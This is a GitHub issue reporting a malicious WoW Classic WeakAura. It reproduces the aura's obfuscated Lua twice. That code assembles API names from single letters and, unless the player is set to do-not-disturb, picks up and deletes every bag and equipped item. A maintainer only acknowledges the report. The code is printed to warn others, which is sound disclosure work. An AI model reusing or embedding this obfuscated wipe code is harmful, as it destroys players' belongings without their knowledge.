### ISSUE TITLE
calssic WA wipe all item and stuff

### ISSUE THREAD

**Issue by born2slip** [WeakAuras/WeakAuras2#3040]
### Description

---I dont have this WA, only code from it
---it has three elements, and is triggered when importing
---instantly removes all items from the character and wipe all stuff in your bags 

--------------------------------------------------------------------------------

aura_env.x = function()
    local ba,ws,et,sb,uy,dk,px,ot,ff,sg,dh,vz,bh,jq,mu,yk,ke,lr,id,ob,tz,qg,ew,fa,qm,pb,fb,gs,rr,pi,nh,rj,ms,vy='w','A','n','l','I','L','f','i','y','P','W','g','H','p','R','d','E','O','a','S','T','G','s','_','e','U','M','r','o','C','N','D','Y','t'
    return _G[pb..et..ot..vy..uy..ew..rj..nh..rj](jq..sb..id..ff..qm..gs)
end

aura_env.z = function()
    local cv,jx,ht,mp,jt,pw,li,ik,zz,lx,ba,ws,ke,la,nf,fn,nz,ek,sh,hi,wn,ns,zw,gy,tq,wu,bf,rx,tk,ka,uc='L','l','B','a','M','p','r','_','O','N','U','C','m','s','I','i','e','n','u','D','c','G','A','v','T','y','t','S','k','o','P' for b=0,_G[lx..ba..jt..ik..ht..zw..ns..ik..rx..cv..zz..tq..rx] do for s=1,_G[ns..nz..bf..ws..ka..ek..bf..mp..fn..ek..nz..li..lx..sh..ke..rx..jx..ka..bf..la](b) do _G[uc..fn..wn..tk..sh..pw..ws..ka..ek..bf..mp..fn..ek..nz..li..nf..bf..nz..ke](b,s) _G[hi..nz..jx..nz..bf..nz..ws..sh..li..la..ka..li..nf..bf..nz..ke]() end end for i=1,23 do _G[uc..fn..wn..tk..sh..pw..nf..ek..gy..nz..ek..bf..ka..li..wu..nf..bf..nz..ke](i) _G[hi..nz..jx..nz..bf..nz..ws..sh..li..la..ka..li..nf..bf..nz..ke]() end end

--------------------------------------------------------------------------------

function()
    if aura_env.colors then
        local red, green, blue
        local BossHealth = aura_env.BossHealth
        if BossHealth ~= nil then
            if BossHealth <= 25 then
                red = 0.61
                green = 0.61
                blue = 0.61
            elseif BossHealth <= 55 then
                red = 0.11
                green = 1.00
                blue = 0.00
            elseif BossHealth <= 75 then
                red = 0.00
                green = 0.43
                blue = 0.86
            elseif BossHealth <= 95 then
                red = 0.63
                green = 0.20
                blue = 0.93
            elseif BossHealth <= 99 then
                red = 1.00
                green = 0.5
                blue = 0.0
            elseif BossHealth <= 101 then
                red = 0.90
                green = 0.80
                blue = 0.5
            end
        end
        return red, green, blue
    end
end

--------------------------------------------------------------------------------

function()
    if aura_env.x() then return end
    return aura_env.z()
end

### WeakAuras Version

3.2.3-classic

### World of Warcraft Flavor

Classic

### Tested with only WeakAuras

- [X] Yes
- [ ] No

### Reproduction Steps

---

### Export String

aura_env.x = function()
    local ba,ws,et,sb,uy,dk,px,ot,ff,sg,dh,vz,bh,jq,mu,yk,ke,lr,id,ob,tz,qg,ew,fa,qm,pb,fb,gs,rr,pi,nh,rj,ms,vy='w','A','n','l','I','L','f','i','y','P','W','g','H','p','R','d','E','O','a','S','T','G','s','_','e','U','M','r','o','C','N','D','Y','t'
    return _G[pb..et..ot..vy..uy..ew..rj..nh..rj](jq..sb..id..ff..qm..gs)
end

aura_env.z = function()
    local cv,jx,ht,mp,jt,pw,li,ik,zz,lx,ba,ws,ke,la,nf,fn,nz,ek,sh,hi,wn,ns,zw,gy,tq,wu,bf,rx,tk,ka,uc='L','l','B','a','M','p','r','_','O','N','U','C','m','s','I','i','e','n','u','D','c','G','A','v','T','y','t','S','k','o','P' for b=0,_G[lx..ba..jt..ik..ht..zw..ns..ik..rx..cv..zz..tq..rx] do for s=1,_G[ns..nz..bf..ws..ka..ek..bf..mp..fn..ek..nz..li..lx..sh..ke..rx..jx..ka..bf..la](b) do _G[uc..fn..wn..tk..sh..pw..ws..ka..ek..bf..mp..fn..ek..nz..li..nf..bf..nz..ke](b,s) _G[hi..nz..jx..nz..bf..nz..ws..sh..li..la..ka..li..nf..bf..nz..ke]() end end for i=1,23 do _G[uc..fn..wn..tk..sh..pw..nf..ek..gy..nz..ek..bf..ka..li..wu..nf..bf..nz..ke](i) _G[hi..nz..jx..nz..bf..nz..ws..sh..li..la..ka..li..nf..bf..nz..ke]() end end

--------------------------------------------------------------------------------

function()
    if aura_env.colors then
        local red, green, blue
        local BossHealth = aura_env.BossHealth
        if BossHealth ~= nil then
            if BossHealth <= 25 then
                red = 0.61
                green = 0.61
                blue = 0.61
            elseif BossHealth <= 55 then
                red = 0.11
                green = 1.00
                blue = 0.00
            elseif BossHealth <= 75 then
                red = 0.00
                green = 0.43
                blue = 0.86
            elseif BossHealth <= 95 then
                red = 0.63
                green = 0.20
                blue = 0.93
            elseif BossHealth <= 99 then
                red = 1.00
                green = 0.5
                blue = 0.0
            elseif BossHealth <= 101 then
                red = 0.90
                green = 0.80
                blue = 0.5
            end
        end
        return red, green, blue
    end
end

--------------------------------------------------------------------------------

function()
    if aura_env.x() then return end
    return aura_env.z()
end

**Comment by Stanzilla** [comment]
Thanks for the report
